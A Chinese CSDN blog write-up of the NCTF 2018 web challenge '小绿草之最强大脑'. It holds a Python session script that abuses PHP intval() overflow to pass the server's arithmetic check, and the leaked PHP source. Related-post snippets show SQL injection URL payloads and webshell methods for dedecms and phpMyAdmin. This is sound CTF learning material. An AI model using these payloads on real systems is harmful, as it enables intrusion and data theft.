[NCTF 2018]小绿草之最强大脑

最新推荐文章于 2024-09-14 17:41:03 发布
最新推荐文章于 2024-09-14 17:41:03 发布
阅读量703 收藏
点赞数 1
文章标签: php javascript dreamweaver web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70819573/article/details/129710754
版权

1.打开环境,发现如此,应该是要写脚本帮助我们答题:

附上自己写的脚本:

import requests
import re
import time
import random
url="http://1.14.71.254:28840/"
s = requests.Session()
res = s.get(url=url)
while(True):
    r = r">(.)<"
    list = re.findall(r,res.text)
    args=""
    for i in list:
        if(i=="="):
            continue
        args+= i
    input1 = "4200000000000000000000"
    args="9223372036854775807"+args
    ans  = (eval(args))
    data={
        'input':input1,
        'ans':ans
    }
    res = s.post(url=url,data=data)
    r = r"现在已经连续答对了(.)次"
    count = re.findall(r,res.text)
    print(count)
    time.sleep(1.5)
    print(res.text)

有几个点需要注意:

1.用dirsearch可以扫出来index.php的源码:

<?php
if(isset($_SESSION['ans']) && isset($_POST['ans'])){
	if(($_SESSION['ans'])+intval($_POST['input'])!=$_POST['ans']){
		session_destroy();
		echo '
		<script language="javascript">  
		alert("怎么没算对呢?");  
		window.history.back(-1);  </script>';
	}
	else{
		if(intval(time())-$_SESSION['time']<1){
			session_destroy();
			echo '
			<script language="javascript">  
			alert("你手速太快啦,服务器承受不住!!!");  
			window.history.back(-1); </script> ';
		}
		if(intval(time())-$_SESSION['time']>2){
			session_destroy();
			echo '
			<script language="javascript">  
			alert("你算的太慢了少年!");  
			window.history.back(-1); </script> ';
		}
		echo '
		<script language="javascript">  
		alert("tql,算对了!!");  
	     </script> ';
		$_SESSION['count']++;
	}
}
?>

需要用time.sleep()来防止访问过快或过慢。

2.intval处理21位以上的数会返回固定的值来防止溢出。

3.需要用s=requests.Session()来保持会话的连续性。

ha0cker
关注
2018NCTF 部分writeup
qq_42863361的博客
11-27 1069
我才不写WP Our 16bit wars ==Difficulty: Easy== 逆向第一步,学好汇编,16位的也要学 // 64位系统运行需要DosBox ==Author: acdxvfsvd== 读十六位汇编
NCTF2018RE部分题WP(some boxes、Our 16bit wars、签到)
siphre
11-26 948
签到 64位 PE文件,x64dbg动态调试到flag打印处,寄存器窗口可以看到flag明文。   ASM16bitre(Our 16bit wars) 16位汇编,一开始装了dosbox准备动态调试,后来发现直接IDA静态分析也能解。 看了16位汇编的一些语法参考文章:   Int 指令 https://blog.csdn.net/SysProgram/article...
NSS [NCTF 2018]小绿草最强大脑
Jay17的博客
11-20 554
NSS [NCTF 2018]小绿草最强大脑
NCTF2018部分题WP(2)
热门推荐
单核CPU的小朋友的博客
11-27 3万+
第一题:滴!晨跑打卡 这道题过滤了空格,但是可以使用url编码来绕过,这里我们可以使用%a0,也就是加号来绕过。 首先查列数: 编码:1%27%a0union%a0select%a01,2,3%27# 很明显可以查出是三列。 然后就是查数据库名: 编码:id=1%27%a0union%a0select%a01,(SELECT%a0GROUP_CONCAT(SCHEMA_NAME)%a0FROM%...
NJUPTCTF-2018出题心得
郁离歌丶的博客
01-21 4633
NJUPTCTF-2018出题心得 NJUPTCTF-2018结束也有几个月了,我也是昨天才忙完各种琐事,包括比赛、考试、出题、总结等等。这段时间经历的事情太多,心也逐渐疲惫,同时感到和同龄人的差距越来越大。现在要补这几个月落下的东西,昨天把CTF学习交流群的入群题出了一下,题目比较简单,希望师傅们别喷。这段时间欠的最久的应该就是校赛的出题心得了吧。虽然我的题全部都有人解出,但是还是有很多人要我写...
2018 南邮 NCTF writeup(部分)更新中---
欢迎光临
11-27 2441
2018 南邮 NCTF writeup 周六的打南邮的比赛,做了一道签到题,接着是一道SQL注入,想了一上午,最终还是没有做出来,怪自己喜欢用sqlmap,加上自己做的sql注入题目少 签到题 点击链接直接跳转到百度了,用burpsoup重放一遍就OK了 滴!晨跑打卡 通过用burpsoup的sql fuzz测试了一下 发现注释了 空格 # - * 将注释全都过滤了,只能用单引号闭合 绕过...
NCTF 2018部分WP(3)
单核CPU的小朋友的博客
11-27 3万+
WEB-基本操作 这道题是郁离歌学姐出的,基本操作。一进去就是一个PHPMyAdmin的页面。直接右击查看网页源代码。 这道题本身也好像是在想方设法的告诉我们这个MYSQL的版本是4.8.1。 一个一个尝试账号密码==猜了半天最后还是某位大佬告诉我这个账号密码都是guest。。。 然后就开始尝试PHPMyadmin的本地文件包含漏洞,希望能够找到flag文件。 首先要知道在URL编码中%3f是用...
[NCTF 2018]签到题
10-06
[NCTF 2018]签到题是一个网页签到题目。根据提供的引用内容,我们可以通过查看网页的源代码来找到flag值。但是经过检查,我们发现没有找到flag值。另外,引用中提到了可以通过观察cookie来获取flag,但具体的方法...
nctf 2018 web复现-手工sql注入
weidaxueshen1的博客
11-28 329
http://ctfgame.acdxvfsvd.net:20001/index.php?id=1'%a0union%a0select%a0database(),(select%a0SCHEMA_NAME%a0from%a0information_schema.SCHEMATA%a0limit%a02,1),3||'1数据库名 http://ctfgame.acdxvfsvd.net:20001...
NCTF-Writeup
Yukikaze_cxy
05-30 1696
南京邮电大学网络攻防训练平台https://cgctf.nuptsast.com以下按本人做题的顺序排序剩余题目待补完。。。【Web】1.签到题nctf{flag_admiaanaaaaaaaaaaa}网页源码2.单身二十年nctf{yougotit_script_now}由于页面自动跳转,使用工具查看search_key.php页面源码即可3.SQL注入1nctf{ni_ye_hui_sql?}...
NCTF 2018 部分题目 WP(1)
单核CPU的小朋友的博客
11-25 3万+
WEB-签到题:直接看cookie就好了,直接拿到flag RE-后门后门后门: 下载一个64位的.exe程序,ida直接打开,观察main函数,发现函数hereisyourflag(void),发现数组变量flagenc,转成char型。 直接拿到flag。 3.PWN-sendflag: IDA打开,很明显溢出了。 直接发送六个a拿到flag。 4.MISC-CalcNow: NC连...
PHP智驭未来悦享生活智慧小区物业管理小程序系统源码
2401_84413757的博客
09-10 709
它集成了多项实用功能,无论是业主还是物业管理人员,都能通过简单的一键操作,轻松实现小区的日常管理。无论是清晨的晨跑,还是夜晚的归家,都不再需要为这些琐事烦恼,真正实现了“智驭未来,悦享生活”。无论是分享生活的点滴,还是参与社区的各类活动,都能让业主们感受到家的温暖和归属感。而今天,我要带大家走进的,正是这股智慧浪潮中的一股清流——“智驭未来悦享生活”智慧小区物业管理小程序。“智驭未来悦享生活”智慧小区物业管理小程序的出现,不仅为小区管理带来了革命性的变革,更为我们描绘了一幅未来生活的美好蓝图。
一码空传临时网盘PHP源码,支持提取码功能
爱酷码的博客
09-11 337
一码空传临时网盘源码V2.0免费授权,该源码提供了一个简单易用的无数据库版临时网盘解决方案。前端采用了layui开发框架,后端使用原生PHP编写,没有引入任何开发框架,保持了代码的简洁和高效。这个程序使用了一个无数据库配置读写类,并借鉴了网络上的config文件读写代码。用户可以通过提取码来提取文件,无需上传文件到服务器。该程序还配备了一个后台管理系统,而且不需要数据库支持。用户上传的文件会保存在upload文件夹中,并按照md5算法进行加密和重命名,确保每次加密结果都不相同。
[极客大挑战 2019]Http
2201_75556700的博客
09-10 525
3、访问Secret.php发现页面有提示,它说它不是来自这个网页。6、添加X-Forwarded-For: 127.0.0.1。5、修改User-Agent为:Syclover。2、查看页面源码发现一个。
dedecms(四种webshell姿势)
最新发布
2301_81881972的博客
09-14 641
点击【系统】【sql命令行工具】--》多行命令中输入select '<?>' into outfile '+路径+创建文件名。与WPCMS类似,直接修改模板拿WebShel..点击【模板】--》【默认模板管理】【index.htm】-->【修改】在文件修改中添加一句话代码.....如下。点击【模块】【广告管理】--》〔【增加一个新广告】 --》在 【广告内容】 处添加一句话代码--》点击 【确定】账号密码同为admin。
【2025】基于PHP职业病健康管理系统(源码+论文+部署讲解等)
程序员阿龙的博客
09-10 1865
博主介绍: ✌我是阿龙,一名专注于Java技术领域的程序员,全网拥有10W+粉丝。作为CSDN特邀作者、博客专家、新星计划导师,我在计算机毕业设计开发方面积累了丰富的经验。同时,我也是掘金、华为云、阿里云、InfoQ等平台的优质作者。通过长期分享和实战指导,我致力于帮助更多学生完成毕业项目和技术提升。 技术范围: 我熟悉的技术领域涵盖SpringBoot、Vue、SSM、HLMT、Jsp、PHP、Nodejs、Python、爬虫、数据可视化、小程序、安卓app、大数据、物联网、机器学习等方
Thinkphp5实现一周签到打卡功能
Crazy_shark的博客
09-10 731
以上是一个简单的 ThinkPHP5 实现一周签到打卡功能的示例。通过设计合适的数据库结构和控制器逻辑,你可以轻松实现用户签到和连续签到天数统计功能。在实际应用中,可能需要考虑更多的细节,如用户身份验证、签到奖励、接口优化等。
Thinkphp5 + Swoole实现邮箱异步通知
Crazy_shark的博客
09-11 586
通过 Swoole 实现的异步任务处理机制,可以将耗时操作如发送邮件等操作放入后台异步执行,提升用户体验和系统性能。Swoole 的 Task 机制非常适合处理这种场景,结合 ThinkPHP 使得开发异步任务更加简单高效。
【getshell】phpmyadmin后台getshell(4.8.5)
m0_71944965的博客
09-11 623
访问一下 最后getshell
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值